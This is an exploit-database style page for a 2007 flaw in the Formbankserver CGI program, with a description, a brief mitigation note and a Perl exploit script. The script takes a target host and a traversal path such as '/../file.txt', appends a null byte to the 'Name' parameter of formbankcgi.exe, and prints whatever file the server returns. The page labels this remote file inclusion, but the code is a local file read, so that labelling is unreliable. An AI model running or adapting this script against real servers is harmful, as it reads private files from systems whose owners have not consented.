header-logo
Suggest Exploit
vendor:
by:
Bl0od3r
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

CGI Remote File Inclusion Vulnerability

This exploit allows an attacker to include remote files in a vulnerable CGI script. By manipulating the 'Name' parameter, an attacker can include arbitrary files from a remote server. This can lead to remote code execution or information disclosure.

Mitigation:

To mitigate this vulnerability, ensure that all user input is properly validated and sanitized before being used in include statements. Additionally, consider using a whitelist approach to limit the files that can be included.
Source

Exploit-DB raw data:

#!perl
#found by Bl0od3r
#visit http://dc3.dl.am  
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";

# milw0rm.com [2007-01-01]

Navigation

Suggest Exploit

Services By CQR